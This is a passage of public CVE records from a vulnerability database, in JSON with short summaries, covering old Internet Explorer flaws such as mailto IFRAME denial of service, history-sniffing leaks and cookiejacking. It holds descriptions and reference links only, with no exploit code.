|---|---|---|---|---|---|---|---|---|
|
||||||||
{
"containers": {
"adp": [
{
"providerMetadata": {
"dateUpdated": "2024-08-07T02:17:13.297Z",
"orgId": "af854a3a-2127-422b-91ae-364da2661108",
"shortName": "CVE"
},
"references": [
{
"tags": [
"x_refsource_MISC",
"x_transferred"
],
"url": "http://websecurity.com.ua/4206/"
},
{
"name": "20100518 DoS vulnerabilities in Firefox, Internet Explorer, Chrome, Opera and other browsers",
"tags": [
"mailing-list",
"x_refsource_BUGTRAQ",
"x_transferred"
],
"url": "http://www.securityfocus.com/archive/1/511327/100/0/threaded"
}
],
"title": "CVE Program Container"
}
],
"cna": {
"affected": [
{
"product": "n/a",
"vendor": "n/a",
"versions": [
{
"status": "affected",
"version": "n/a"
}
]
}
],
"datePublic": "2010-05-18T00:00:00",
"descriptions": [
{
"lang": "en",
"value": "Microsoft Internet Explorer 6.0.2900.2180, 7, and 8.0.7600.16385 executes a mail application in situations where an IFRAME element has a mailto: URL in its SRC attribute, which allows remote attackers to cause a denial of service (excessive application launches) via an HTML document with many IFRAME elements."
}
],
"problemTypes": [
{
"descriptions": [
{
"description": "n/a",
"lang": "en",
"type": "text"
}
]
}
],
"providerMetadata": {
"dateUpdated": "2018-10-10T18:57:01",
"orgId": "8254265b-2729-46b6-b9e3-3dfca2d5bfca",
"shortName": "mitre"
},
"references": [
{
"tags": [
"x_refsource_MISC"
],
"url": "http://websecurity.com.ua/4206/"
},
{
"name": "20100518 DoS vulnerabilities in Firefox, Internet Explorer, Chrome, Opera and other browsers",
"tags": [
"mailing-list",
"x_refsource_BUGTRAQ"
],
"url": "http://www.securityfocus.com/archive/1/511327/100/0/threaded"
}
],
"x_legacyV4Record": {
"CVE_data_meta": {
"ASSIGNER": "cve@mitre.org",
"ID": "CVE-2010-1991",
"STATE": "PUBLIC"
},
"affects": {
"vendor": {
"vendor_data": [
{
"product": {
"product_data": [
{
"product_name": "n/a",
"version": {
"version_data": [
{
"version_value": "n/a"
}
]
}
}
]
},
"vendor_name": "n/a"
}
]
}
},
"data_format": "MITRE",
"data_type": "CVE",
"data_version": "4.0",
"description": {
"description_data": [
{
"lang": "eng",
"value": "Microsoft Internet Explorer 6.0.2900.2180, 7, and 8.0.7600.16385 executes a mail application in situations where an IFRAME element has a mailto: URL in its SRC attribute, which allows remote attackers to cause a denial of service (excessive application launches) via an HTML document with many IFRAME elements."
}
]
},
"problemtype": {
"problemtype_data": [
{
"description": [
{
"lang": "eng",
"value": "n/a"
}
]
}
]
},
"references": {
"reference_data": [
{
"name": "http://websecurity.com.ua/4206/",
"refsource": "MISC",
"url": "http://websecurity.com.ua/4206/"
},
{
"name": "20100518 DoS vulnerabilities in Firefox, Internet Explorer, Chrome, Opera and other browsers",
"refsource": "BUGTRAQ",
"url": "http://www.securityfocus.com/archive/1/511327/100/0/threaded"
}
]
}
}
}
},
"cveMetadata": {
"assignerOrgId": "8254265b-2729-46b6-b9e3-3dfca2d5bfca",
"assignerShortName": "mitre",
"cveId": "CVE-2010-1991",
"datePublished": "2010-05-20T17:00:00",
"dateReserved": "2010-05-20T00:00:00",
"dateUpdated": "2024-08-07T02:17:13.297Z",
"state": "PUBLISHED"
},
"dataType": "CVE_RECORD",
"dataVersion": "5.1"
}
CVE-2012-1545 (GCVE-0-2012-1545)
Vulnerability from nvd – Published: 2012-03-09 11:00 – Updated: 2024-09-17 02:01
VLAI?
Summary
Microsoft Internet Explorer 6 through 9, and 10 Consumer Preview, allows remote attackers to bypass Protected Mode or cause a denial of service (memory corruption) by leveraging access to a Low integrity process, as demonstrated by VUPEN during a Pwn2Own competition at CanSecWest 2012.
Severity ?
No CVSS data available.
CWE
- n/a
Assigner
References
| URL | Tags | |||||||||||||
|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|
|
||||||||||||||
{
"containers": {
"adp": [
{
"providerMetadata": {
"dateUpdated": "2024-08-06T19:01:02.832Z",
"orgId": "af854a3a-2127-422b-91ae-364da2661108",
"shortName": "CVE"
},
"references": [
{
"tags": [
"x_refsource_MISC",
"x_transferred"
],
"url": "http://pwn2own.zerodayinitiative.com/status.html"
},
{
"tags": [
"x_refsource_MISC",
"x_transferred"
],
"url": "http://arstechnica.com/business/news/2012/03/ie-9-on-latest-windows-gets-stomped-at-hacker-contest.ars"
},
{
"tags": [
"x_refsource_MISC",
"x_transferred"
],
"url": "http://www.zdnet.com/blog/security/pwn2own-2012-ie-9-hacked-with-two-0day-vulnerabilities/10621"
},
{
"tags": [
"x_refsource_MISC",
"x_transferred"
],
"url": "http://twitter.com/vupen/statuses/177895844828291073"
}
],
"title": "CVE Program Container"
}
],
"cna": {
"affected": [
{
"product": "n/a",
"vendor": "n/a",
"versions": [
{
"status": "affected",
"version": "n/a"
}
]
}
],
"descriptions": [
{
"lang": "en",
"value": "Microsoft Internet Explorer 6 through 9, and 10 Consumer Preview, allows remote attackers to bypass Protected Mode or cause a denial of service (memory corruption) by leveraging access to a Low integrity process, as demonstrated by VUPEN during a Pwn2Own competition at CanSecWest 2012."
}
],
"problemTypes": [
{
"descriptions": [
{
"description": "n/a",
"lang": "en",
"type": "text"
}
]
}
],
"providerMetadata": {
"dateUpdated": "2012-03-09T11:00:00Z",
"orgId": "8254265b-2729-46b6-b9e3-3dfca2d5bfca",
"shortName": "mitre"
},
"references": [
{
"tags": [
"x_refsource_MISC"
],
"url": "http://pwn2own.zerodayinitiative.com/status.html"
},
{
"tags": [
"x_refsource_MISC"
],
"url": "http://arstechnica.com/business/news/2012/03/ie-9-on-latest-windows-gets-stomped-at-hacker-contest.ars"
},
{
"tags": [
"x_refsource_MISC"
],
"url": "http://www.zdnet.com/blog/security/pwn2own-2012-ie-9-hacked-with-two-0day-vulnerabilities/10621"
},
{
"tags": [
"x_refsource_MISC"
],
"url": "http://twitter.com/vupen/statuses/177895844828291073"
}
],
"x_legacyV4Record": {
"CVE_data_meta": {
"ASSIGNER": "cve@mitre.org",
"ID": "CVE-2012-1545",
"STATE": "PUBLIC"
},
"affects": {
"vendor": {
"vendor_data": [
{
"product": {
"product_data": [
{
"product_name": "n/a",
"version": {
"version_data": [
{
"version_value": "n/a"
}
]
}
}
]
},
"vendor_name": "n/a"
}
]
}
},
"data_format": "MITRE",
"data_type": "CVE",
"data_version": "4.0",
"description": {
"description_data": [
{
"lang": "eng",
"value": "Microsoft Internet Explorer 6 through 9, and 10 Consumer Preview, allows remote attackers to bypass Protected Mode or cause a denial of service (memory corruption) by leveraging access to a Low integrity process, as demonstrated by VUPEN during a Pwn2Own competition at CanSecWest 2012."
}
]
},
"problemtype": {
"problemtype_data": [
{
"description": [
{
"lang": "eng",
"value": "n/a"
}
]
}
]
},
"references": {
"reference_data": [
{
"name": "http://pwn2own.zerodayinitiative.com/status.html",
"refsource": "MISC",
"url": "http://pwn2own.zerodayinitiative.com/status.html"
},
{
"name": "http://arstechnica.com/business/news/2012/03/ie-9-on-latest-windows-gets-stomped-at-hacker-contest.ars",
"refsource": "MISC",
"url": "http://arstechnica.com/business/news/2012/03/ie-9-on-latest-windows-gets-stomped-at-hacker-contest.ars"
},
{
"name": "http://www.zdnet.com/blog/security/pwn2own-2012-ie-9-hacked-with-two-0day-vulnerabilities/10621",
"refsource": "MISC",
"url": "http://www.zdnet.com/blog/security/pwn2own-2012-ie-9-hacked-with-two-0day-vulnerabilities/10621"
},
{
"name": "http://twitter.com/vupen/statuses/177895844828291073",
"refsource": "MISC",
"url": "http://twitter.com/vupen/statuses/177895844828291073"
}
]
}
}
}
},
"cveMetadata": {
"assignerOrgId": "8254265b-2729-46b6-b9e3-3dfca2d5bfca",
"assignerShortName": "mitre",
"cveId": "CVE-2012-1545",
"datePublished": "2012-03-09T11:00:00Z",
"dateReserved": "2012-03-09T00:00:00Z",
"dateUpdated": "2024-09-17T02:01:01.177Z",
"state": "PUBLISHED"
},
"dataType": "CVE_RECORD",
"dataVersion": "5.1"
}
CVE-2010-5071 (GCVE-0-2010-5071)
Vulnerability from nvd – Published: 2011-12-07 19:00 – Updated: 2024-09-16 23:31
VLAI?
Summary
The JavaScript implementation in Microsoft Internet Explorer 8.0 and earlier does not properly restrict the set of values contained in the object returned by the getComputedStyle method, which allows remote attackers to obtain sensitive information about visited web pages by calling this method.
Severity ?
No CVSS data available.
CWE
- n/a
Assigner
References
| URL | Tags | ||||
|---|---|---|---|---|---|
|
|||||
{
"containers": {
"adp": [
{
"providerMetadata": {
"dateUpdated": "2024-08-07T04:09:38.985Z",
"orgId": "af854a3a-2127-422b-91ae-364da2661108",
"shortName": "CVE"
},
"references": [
{
"tags": [
"x_refsource_MISC",
"x_transferred"
],
"url": "http://w2spconf.com/2010/papers/p26.pdf"
}
],
"title": "CVE Program Container"
}
],
"cna": {
"affected": [
{
"product": "n/a",
"vendor": "n/a",
"versions": [
{
"status": "affected",
"version": "n/a"
}
]
}
],
"descriptions": [
{
"lang": "en",
"value": "The JavaScript implementation in Microsoft Internet Explorer 8.0 and earlier does not properly restrict the set of values contained in the object returned by the getComputedStyle method, which allows remote attackers to obtain sensitive information about visited web pages by calling this method."
}
],
"problemTypes": [
{
"descriptions": [
{
"description": "n/a",
"lang": "en",
"type": "text"
}
]
}
],
"providerMetadata": {
"dateUpdated": "2011-12-07T19:00:00Z",
"orgId": "8254265b-2729-46b6-b9e3-3dfca2d5bfca",
"shortName": "mitre"
},
"references": [
{
"tags": [
"x_refsource_MISC"
],
"url": "http://w2spconf.com/2010/papers/p26.pdf"
}
],
"x_legacyV4Record": {
"CVE_data_meta": {
"ASSIGNER": "cve@mitre.org",
"ID": "CVE-2010-5071",
"STATE": "PUBLIC"
},
"affects": {
"vendor": {
"vendor_data": [
{
"product": {
"product_data": [
{
"product_name": "n/a",
"version": {
"version_data": [
{
"version_value": "n/a"
}
]
}
}
]
},
"vendor_name": "n/a"
}
]
}
},
"data_format": "MITRE",
"data_type": "CVE",
"data_version": "4.0",
"description": {
"description_data": [
{
"lang": "eng",
"value": "The JavaScript implementation in Microsoft Internet Explorer 8.0 and earlier does not properly restrict the set of values contained in the object returned by the getComputedStyle method, which allows remote attackers to obtain sensitive information about visited web pages by calling this method."
}
]
},
"problemtype": {
"problemtype_data": [
{
"description": [
{
"lang": "eng",
"value": "n/a"
}
]
}
]
},
"references": {
"reference_data": [
{
"name": "http://w2spconf.com/2010/papers/p26.pdf",
"refsource": "MISC",
"url": "http://w2spconf.com/2010/papers/p26.pdf"
}
]
}
}
}
},
"cveMetadata": {
"assignerOrgId": "8254265b-2729-46b6-b9e3-3dfca2d5bfca",
"assignerShortName": "mitre",
"cveId": "CVE-2010-5071",
"datePublished": "2011-12-07T19:00:00Z",
"dateReserved": "2011-12-07T00:00:00Z",
"dateUpdated": "2024-09-16T23:31:42.872Z",
"state": "PUBLISHED"
},
"dataType": "CVE_RECORD",
"dataVersion": "5.1"
}
CVE-2002-2435 (GCVE-0-2002-2435)
Vulnerability from nvd – Published: 2011-12-07 19:00 – Updated: 2024-08-08 04:06
VLAI?
Summary
The Cascading Style Sheets (CSS) implementation in Microsoft Internet Explorer 8.0 and earlier does not properly handle the :visited pseudo-class, which allows remote attackers to obtain sensitive information about visited web pages via a crafted HTML document, a related issue to CVE-2010-2264.
Severity ?
No CVSS data available.
CWE
- n/a
Assigner
References
| URL | Tags | ||||||||||
|---|---|---|---|---|---|---|---|---|---|---|---|
|
|||||||||||
{
"containers": {
"adp": [
{
"providerMetadata": {
"dateUpdated": "2024-08-08T04:06:54.637Z",
"orgId": "af854a3a-2127-422b-91ae-364da2661108",
"shortName": "CVE"
},
"references": [
{
"tags": [
"x_refsource_MISC",
"x_transferred"
],
"url": "http://w2spconf.com/2010/papers/p26.pdf"
},
{
"name": "ms-ie-css-info-disc(71817)",
"tags": [
"vdb-entry",
"x_refsource_XF",
"x_transferred"
],
"url": "https://exchange.xforce.ibmcloud.com/vulnerabilities/71817"
},
{
"tags": [
"x_refsource_MISC",
"x_transferred"
],
"url": "http://bugzilla.mozilla.org/show_bug.cgi?id=147777"
}
],
"title": "CVE Program Container"
}
],
"cna": {
"affected": [
{
"product": "n/a",
"vendor": "n/a",
"versions": [
{
"status": "affected",
"version": "n/a"
}
]
}
],
"datePublic": "2002-06-10T00:00:00",
"descriptions": [
{
"lang": "en",
"value": "The Cascading Style Sheets (CSS) implementation in Microsoft Internet Explorer 8.0 and earlier does not properly handle the :visited pseudo-class, which allows remote attackers to obtain sensitive information about visited web pages via a crafted HTML document, a related issue to CVE-2010-2264."
}
],
"problemTypes": [
{
"descriptions": [
{
"description": "n/a",
"lang": "en",
"type": "text"
}
]
}
],
"providerMetadata": {
"dateUpdated": "2017-08-28T12:57:01",
"orgId": "8254265b-2729-46b6-b9e3-3dfca2d5bfca",
"shortName": "mitre"
},
"references": [
{
"tags": [
"x_refsource_MISC"
],
"url": "http://w2spconf.com/2010/papers/p26.pdf"
},
{
"name": "ms-ie-css-info-disc(71817)",
"tags": [
"vdb-entry",
"x_refsource_XF"
],
"url": "https://exchange.xforce.ibmcloud.com/vulnerabilities/71817"
},
{
"tags": [
"x_refsource_MISC"
],
"url": "http://bugzilla.mozilla.org/show_bug.cgi?id=147777"
}
],
"x_legacyV4Record": {
"CVE_data_meta": {
"ASSIGNER": "cve@mitre.org",
"ID": "CVE-2002-2435",
"STATE": "PUBLIC"
},
"affects": {
"vendor": {
"vendor_data": [
{
"product": {
"product_data": [
{
"product_name": "n/a",
"version": {
"version_data": [
{
"version_value": "n/a"
}
]
}
}
]
},
"vendor_name": "n/a"
}
]
}
},
"data_format": "MITRE",
"data_type": "CVE",
"data_version": "4.0",
"description": {
"description_data": [
{
"lang": "eng",
"value": "The Cascading Style Sheets (CSS) implementation in Microsoft Internet Explorer 8.0 and earlier does not properly handle the :visited pseudo-class, which allows remote attackers to obtain sensitive information about visited web pages via a crafted HTML document, a related issue to CVE-2010-2264."
}
]
},
"problemtype": {
"problemtype_data": [
{
"description": [
{
"lang": "eng",
"value": "n/a"
}
]
}
]
},
"references": {
"reference_data": [
{
"name": "http://w2spconf.com/2010/papers/p26.pdf",
"refsource": "MISC",
"url": "http://w2spconf.com/2010/papers/p26.pdf"
},
{
"name": "ms-ie-css-info-disc(71817)",
"refsource": "XF",
"url": "https://exchange.xforce.ibmcloud.com/vulnerabilities/71817"
},
{
"name": "http://bugzilla.mozilla.org/show_bug.cgi?id=147777",
"refsource": "MISC",
"url": "http://bugzilla.mozilla.org/show_bug.cgi?id=147777"
}
]
}
}
}
},
"cveMetadata": {
"assignerOrgId": "8254265b-2729-46b6-b9e3-3dfca2d5bfca",
"assignerShortName": "mitre",
"cveId": "CVE-2002-2435",
"datePublished": "2011-12-07T19:00:00",
"dateReserved": "2011-12-07T00:00:00",
"dateUpdated": "2024-08-08T04:06:54.637Z",
"state": "PUBLISHED"
},
"dataType": "CVE_RECORD",
"dataVersion": "5.1"
}
CVE-2011-2383 (GCVE-0-2011-2383)
Vulnerability from nvd – Published: 2011-06-03 17:00 – Updated: 2024-08-06 23:00
VLAI?
Summary
Microsoft Internet Explorer 9 and earlier does not properly restrict cross-zone drag-and-drop actions, which allows user-assisted remote attackers to read cookie files via vectors involving an IFRAME element with a SRC attribute containing an http: URL that redirects to a file: URL, as demonstrated by a Facebook game, related to a "cookiejacking" issue, aka "Drag and Drop Information Disclosure Vulnerability." NOTE: this vulnerability exists because of an incomplete fix in the Internet Explorer 9 release.
Severity ?
No CVSS data available.
CWE
- n/a
Assigner
References
| URL | Tags | |||||||||||||||||||||||||||||||||||||
|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|
|
||||||||||||||||||||||||||||||||||||||
{
"containers": {
"adp": [
{
"providerMetadata": {
"dateUpdated": "2024-08-06T23:00:33.783Z",
"orgId": "af854a3a-2127-422b-91ae-364da2661108",
"shortName": "CVE"
},
"references": [
{
"tags": [
"x_refsource_MISC",
"x_transferred"
],
"url": "http://www.informationweek.com/news/security/vulnerabilities/229700031"
},
{
"name": "MS11-057",
"tags": [
"vendor-advisory",
"x_refsource_MS",
"x_transferred"
],
"url": "https://docs.microsoft.com/en-us/security-updates/securitybulletins/2011/ms11-057"
},
{
"tags": [
"x_refsource_MISC",
"x_transferred"
],
"url": "http://conference.hackinthebox.org/hitbsecconf2011ams/?page_id=1388"
},
{
"tags": [
"x_refsource_MISC",
"x_transferred"
],
"url": "http://news.cnet.com/8301-1009_3-20066419-83.html"
},
{
"tags": [
"x_refsource_MISC",
"x_transferred"
],
"url": "http://www.eweek.com/c/a/Security/IE-Flaw-Lets-Attackers-Steal-Cookies-Access-User-Accounts-402503/"
},
{
"tags": [
"x_refsource_MISC",
"x_transferred"
],
"url": "http://www.theregister.co.uk/2011/05/25/microsoft_internet_explorer_cookiejacking/"
},
{
"name": "oval:org.mitre.oval:def:12820",
"tags": [
"vdb-entry",
"signature",
"x_refsource_OVAL",
"x_transferred"
],
"url": "https://oval.cisecurity.org/repository/search/definition/oval%3Aorg.mitre.oval%3Adef%3A12820"
},
{
"tags": [
"x_refsource_MISC",
"x_transferred"
],
"url": "http://www.youtube.com/watch?v=VsSkcnIFCxM"
},
{
"tags": [
"x_refsource_MISC",
"x_transferred"
],
"url": "http://ju12.tistory.com/attachment/cfile4.uf%40151FAB4C4DDC9E0002A6FE.ppt"
},
{
"tags": [
"x_refsource_MISC",
"x_transferred"
],
"url": "http://www.networkworld.com/community/node/74259"
},
{
"tags": [
"x_refsource_MISC",
"x_transferred"
],
"url": "http://www.youtube.com/watch?v=V95CX-3JpK0"
},
{
"tags": [
"x_refsource_MISC",
"x_transferred"
],
"url": "https://sites.google.com/site/tentacoloviola/cookiejacking/Cookiejacking2011_final.ppt"
}
],
"title": "CVE Program Container"
}
],
"cna": {
"affected": [
{
"product": "n/a",
"vendor": "n/a",
"versions": [
{
"status": "affected",
"version": "n/a"
}
]
}
],
"datePublic": "2011-05-20T00:00:00",
"descriptions": [
{
"lang": "en",
"value": "Microsoft Internet Explorer 9 and earlier does not properly restrict cross-zone drag-and-drop actions, which allows user-assisted remote attackers to read cookie files via vectors involving an IFRAME element with a SRC attribute containing an http: URL that redirects to a file: URL, as demonstrated by a Facebook game, related to a \"cookiejacking\" issue, aka \"Drag and Drop Information Disclosure Vulnerability.\" NOTE: this vulnerability exists because of an incomplete fix in the Internet Explorer 9 release."
}
],
"problemTypes": [
{
"descriptions": [
{
"description": "n/a",
"lang": "en",
"type": "text"
}
]
}
],
"providerMetadata": {
"dateUpdated": "2018-10-12T19:57:01",
"orgId": "8254265b-2729-46b6-b9e3-3dfca2d5bfca",
"shortName": "mitre"
},
"references": [
{
"tags": [
"x_refsource_MISC"
],
"url": "http://www.informationweek.com/news/security/vulnerabilities/229700031"
},
{
"name": "MS11-057",
"tags": [
"vendor-advisory",
"x_refsource_MS"
],
"url": "https://docs.microsoft.com/en-us/security-updates/securitybulletins/2011/ms11-057"
},
{
"tags": [
"x_refsource_MISC"
],
"url": "http://conference.hackinthebox.org/hitbsecconf2011ams/?page_id=1388"
},
{
"tags": [
"x_refsource_MISC"
],
"url": "http://news.cnet.com/8301-1009_3-20066419-83.html"
},
{
"tags": [
"x_refsource_MISC"
],
"url": "http://www.eweek.com/c/a/Security/IE-Flaw-Lets-Attackers-Steal-Cookies-Access-User-Accounts-402503/"
},
{
"tags": [
"x_refsource_MISC"
],
"url": "http://www.theregister.co.uk/2011/05/25/microsoft_internet_explorer_cookiejacking/"
},
{
"name": "oval:org.mitre.oval:def:12820",
"tags": [
"vdb-entry",
"signature",
"x_refsource_OVAL"
],
"url": "https://oval.cisecurity.org/repository/search/definition/oval%3Aorg.mitre.oval%3Adef%3A12820"
},
{
"tags": [
"x_refsource_MISC"
],
"url": "http://www.youtube.com/watch?v=VsSkcnIFCxM"
},
{
"tags": [
"x_refsource_MISC"
],
"url": "http://ju12.tistory.com/attachment/cfile4.uf%40151FAB4C4DDC9E0002A6FE.ppt"
},
{
"tags": [
"x_refsource_MISC"
],
"url": "http://www.networkworld.com/community/node/74259"
},
{
"tags": [
"x_refsource_MISC"
],
"url": "http://www.youtube.com/watch?v=V95CX-3JpK0"
},
{
"tags": [
"x_refsource_MISC"
],
"url": "https://sites.google.com/site/tentacoloviola/cookiejacking/Cookiejacking2011_final.ppt"
}
],
"x_legacyV4Record": {
"CVE_data_meta": {
"ASSIGNER": "cve@mitre.org",
"ID": "CVE-2011-2383",
"STATE": "PUBLIC"
},
"affects": {
"vendor": {
"vendor_data": [
{
"product": {
"product_data": [
{
"product_name": "n/a",
"version": {
"version_data": [
{
"version_value": "n/a"
}
]
}
}
]
},
"vendor_name": "n/a"
}
]
}
},
"data_format": "MITRE",
"data_type": "CVE",
"data_version": "4.0",
"description": {
"description_data": [
{
"lang": "eng",
"value": "Microsoft Internet Explorer 9 and earlier does not properly restrict cross-zone drag-and-drop actions, which allows user-assisted remote attackers to read cookie files via vectors involving an IFRAME element with a SRC attribute containing an http: URL that redirects to a file: URL, as demonstrated by a Facebook game, related to a \"cookiejacking\" issue, aka \"Drag and Drop Information Disclosure Vulnerability.\" NOTE: this vulnerability exists because of an incomplete fix in the Internet Explorer 9 release."
}
]
},
"problemtype": {
"problemtype_data": [
{
"description": [
{
"lang": "eng",
"value": "n/a"
}
]
}
]
},
"references": {
"reference_data": [
{
"name": "http://www.informationweek.com/news/security/vulnerabilities/229700031",
"refsource": "MISC",
"url": "http://www.informationweek.com/news/security/vulnerabilities/229700031"
},
{
"name": "MS11-057",
"refsource": "MS",
"url": "https://docs.microsoft.com/en-us/security-updates/securitybulletins/2011/ms11-057"
},
{
"name": "http://conference.hackinthebox.org/hitbsecconf2011ams/?page_id=1388",
"refsource": "MISC",
"url": "http://conference.hackinthebox.org/hitbsecconf2011ams/?page_id=1388"
},
{
"name": "http://news.cnet.com/8301-1009_3-20066419-83.html",
"refsource": "MISC",
"url": "http://news.cnet.com/8301-1009_3-20066419-83.html"
},
{
"name": "http://www.eweek.com/c/a/Security/IE-Flaw-Lets-Attackers-Steal-Cookies-Access-User-Accounts-402503/",
"refsource": "MISC",
"url": "http://www.eweek.com/c/a/Security/IE-Flaw-Lets-Attackers-Steal-Cookies-Access-User-Accounts-402503/"
},
{
"name": "http://www.theregister.co.uk/2011/05/25/microsoft_internet_explorer_cookiejacking/",
"refsource": "MISC",
"url": "http://www.theregister.co.uk/2011/05/25/microsoft_internet_explorer_cookiejacking/"
},
{
"name": "oval:org.mitre.oval:def:12820",
"refsource": "OVAL",
"url": "https://oval.cisecurity.org/repository/search/definition/oval%3Aorg.mitre.oval%3Adef%3A12820"
},
{
"name": "http://www.youtube.com/watch?v=VsSkcnIFCxM",
"refsource": "MISC",
"url": "http://www.youtube.com/watch?v=VsSkcnIFCxM"
},
{
"name": "http://ju12.tistory.com/attachment/cfile4.uf@151FAB4C4DDC9E0002A6FE.ppt",
"refsource": "MISC",
"url": "http://ju12.tistory.com/attachment/cfile4.uf@151FAB4C4DDC9E0002A6FE.ppt"
},
{
"name": "http://www.networkworld.com/community/node/74259",
"refsource": "MISC",
"url": "http://www.networkworld.com/community/node/74259"
},
{
"name": "http://www.youtube.com/watch?v=V95CX-3JpK0",
"refsource": "MISC",
"url": "http://www.youtube.com/watch?v=V95CX-3JpK0"
},
{
"name": "https://sites.google.com/site/tentacoloviola/cookiejacking/Cookiejacking2011_final.ppt",
"refsource": "MISC",
"url": "https://sites.google.com/site/tentacoloviola/cookiejacking/Cookiejacking2011_final.ppt"
}
]
}
}
}
},
"cveMetadata": {
"assignerOrgId": "8254265b-2729-46b6-b9e3-3dfca2d5bfca",
"assignerShortName": "mitre",
"cveId": "CVE-2011-2383",
"datePublished": "2011-06-03T17:00:00",
"dateReserved": "2011-06-03T00:00:00",
"dateUpdated": "2024-08-06T23:00:33.783Z",
"state": "PUBLISHED"
},
"dataType": "CVE_RECORD",
"dataVersion": "5.1"
}
CVE-2011-2382 (GCVE-0-2011-2382)
Vulnerability from nvd – Published: 2011-06-03 17:00 – Updated: 2024-09-17 02:41
VLAI?
Summary
Microsoft Internet Explorer 8 and earlier, and Internet Explorer 9 beta, does not properly restrict cross-zone drag-and-drop actions, which allows user-assisted remote attackers to read cookie files via vectors involving an IFRAME element with a SRC attribute containing a file: URL, as demonstrated by a Facebook game, related to a "cookiejacking" issue.
Severity ?
No CVSS data available.
CWE
- n/a
Assigner
References
| URL | Tags | |||||||||||||||||||||||||||||||
|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|
|
||||||||||||||||||||||||||||||||
{
"containers": {
"adp": [
{
"providerMetadata": {
"dateUpdated": "2024-08-06T23:00:33.554Z",
"orgId": "af854a3a-2127-422b-91ae-364da2661108",
"shortName": "CVE"
},
"references": [
{
"tags": [
"x_refsource_MISC",
"x_transferred"
],
"url": "http://www.informationweek.com/news/security/vulnerabilities/229700031"
},
{
"tags": [
"x_refsource_MISC",
"x_transferred"
],
"url": "http://conference.hackinthebox.org/hitbsecconf2011ams/?page_id=1388"
},
{
"tags": [
"x_refsource_MISC",
"x_transferred"
],
"url": "http://news.cnet.com/8301-1009_3-20066419-83.html"
},
{
"tags": [
"x_refsource_MISC",
"x_transferred"
],
"url": "http://www.eweek.com/c/a/Security/IE-Flaw-Lets-Attackers-Steal-Cookies-Access-User-Accounts-402503/"
},
{
"tags": [
"x_refsource_MISC",
"x_transferred"
],
"url": "http://www.theregister.co.uk/2011/05/25/microsoft_internet_explorer_cookiejacking/"
},
{
"tags": [
"x_refsource_MISC",
"x_transferred"
],
"url": "http://www.youtube.com/watch?v=VsSkcnIFCxM"
},
{
"tags": [
"x_refsource_MISC",
"x_transferred"
],
"url": "http://ju12.tistory.com/attachment/cfile4.uf%40151FAB4C4DDC9E0002A6FE.ppt"
},
{
"tags": [
"x_refsource_MISC",
"x_transferred"
],
"url": "http://www.networkworld.com/community/node/74259"
},
{
"tags": [
"x_refsource_MISC",
"x_transferred"
],
"url": "http://www.youtube.com/watch?v=V95CX-3JpK0"
},
{
"tags": [
"x_refsource_MISC",
"x_transferred"
],
"url": "https://sites.google.com/site/tentacoloviola/cookiejacking/Cookiejacking2011_final.ppt"
}
],
"title": "CVE Program Container"
}
],
"cna": {
"affected": [
{
"product": "n/a",
"vendor": "n/a",
"versions": [
{
"status": "affected",
"version": "n/a"
}
]
}
],
"descriptions": [
{
"lang": "en",
"value": "Microsoft Internet Explorer 8 and earlier, and Internet Explorer 9 beta, does not properly restrict cross-zone drag-and-drop actions, which allows user-assisted remote attackers to read cookie files via vectors involving an IFRAME element with a SRC attribute containing a file: URL, as demonstrated by a Facebook game, related to a \"cookiejacking\" issue."
}
],
"problemTypes": [
{
"descriptions": [
{
"description": "n/a",
"lang": "en",
"type": "text"
}
]
}
],
"providerMetadata": {
"dateUpdated": "2011-06-03T17:00:00Z",
"orgId": "8254265b-2729-46b6-b9e3-3dfca2d5bfca",
"shortName": "mitre"
},
"references": [
{
"tags": [
"x_refsource_MISC"
],
"url": "http://www.informationweek.com/news/security/vulnerabilities/229700031"
},
{
"tags": [
"x_refsource_MISC"
],
"url": "http://conference.hackinthebox.org/hitbsecconf2011ams/?page_id=1388"
},
{
"tags": [
"x_refsource_MISC"
],
"url": "http://news.cnet.com/8301-1009_3-20066419-83.html"
},
{
"tags": [
"x_refsource_MISC"
],
"url": "http://www.eweek.com/c/a/Security/IE-Flaw-Lets-Attackers-Steal-Cookies-Access-User-Accounts-402503/"
},
{
"tags": [
"x_refsource_MISC"
],
"url": "http://www.theregister.co.uk/2011/05/25/microsoft_internet_explorer_cookiejacking/"
},
{
"tags": [
"x_refsource_MISC"
],
"url": "http://www.youtube.com/watch?v=VsSkcnIFCxM"
},
{
"tags": [
"x_refsource_MISC"
],
"url": "http://ju12.tistory.com/attachment/cfile4.uf%40151FAB4C4DDC9E0002A6FE.ppt"
},
{
"tags": [
"x_refsource_MISC"
],
"url": "http://www.networkworld.com/community/node/74259"
},
{
"tags": [
"x_refsource_MISC"
],
"url": "http://www.youtube.com/watch?v=V95CX-3JpK0"
},
{
"tags": [
"x_refsource_MISC"
],
"url": "https://sites.google.com/site/tentacoloviola/cookiejacking/Cookiejacking2011_final.ppt"
}
],
"x_legacyV4Record": {
"CVE_data_meta": {
"ASSIGNER": "cve@mitre.org",
"ID": "CVE-2011-2382",
"STATE": "PUBLIC"
},
"affects": {
"vendor": {
"vendor_data": [
{
"product": {
"product_data": [
{
"product_name": "n/a",
"version": {
"version_data": [
{
"version_value": "n/a"
}
]
}
}
]
},
"vendor_name": "n/a"
}
]
}
},
"data_format": "MITRE",
"data_type": "CVE",
"data_version": "4.0",
"description": {
"description_data": [
{
"lang": "eng",
"value": "Microsoft Internet Explorer 8 and earlier, and Internet Explorer 9 beta, does not properly restrict cross-zone drag-and-drop actions, which allows user-assisted remote attackers to read cookie files via vectors involving an IFRAME element with a SRC attribute containing a file: URL, as demonstrated by a Facebook game, related to a \"cookiejacking\" issue."
}
]
},
"problemtype": {
"problemtype_data": [
{
"description": [
{
"lang": "eng",
"value": "n/a"
}
]
}
]
},
"references": {
"reference_data": [
{
"name": "http://www.informationweek.com/news/security/vulnerabilities/229700031",
"refsource": "MISC",
"url": "http://www.informationweek.com/news/security/vulnerabilities/229700031"
},
{
"name": "http://conference.hackinthebox.org/hitbsecconf2011ams/?page_id=1388",
"refsource": "MISC",
"url": "http://conference.hackinthebox.org/hitbsecconf2011ams/?page_id=1388"
},
{
"name": "http://news.cnet.com/8301-1009_3-20066419-83.html",
"refsource": "MISC",
"url": "http://news.cnet.com/8301-1009_3-20066419-83.html"
},
{
